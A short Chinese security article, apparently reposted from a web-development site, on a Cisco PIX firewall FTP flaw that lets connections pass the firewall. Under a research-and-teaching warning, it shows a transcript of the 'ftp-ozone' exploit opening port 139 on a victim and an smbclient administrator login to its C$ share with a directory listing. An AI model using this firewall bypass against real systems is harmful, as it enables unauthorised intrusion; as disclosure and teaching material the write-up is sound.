PIX防火墙FTP漏洞允许非法通过防火墙
2008-12-18 12:19:09 来源:WEB开发网------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面是针对第一个漏洞的攻击分析:
------Exploit Launched--------
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500 '..................................................................
.........................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------Opened port connected (NBT)-------
[root@ix ftp-atk]# smbclient \VICTIMc$ -I 10.1.2.3 -U administrator
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: > dir
AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58
2000
boot.ini ASR 279 Mon Mar 13 03:15:07
2000
CONFIG.SYS A 0 Mon Mar 13 03:22:58
2000
IO.SYS AHSR 0 Mon Mar 13 03:22:58
2000
MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58
2000
MSSCE D 0 Tue Mar 7 14:29:57
2000
NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49
2000
ntldr AHSR 156496 Tue Mar 7 11:47:49
2000
pagefile.sys A1073741824 Tue Mar 7 11:51:51
2000
更多精彩
赞助商链接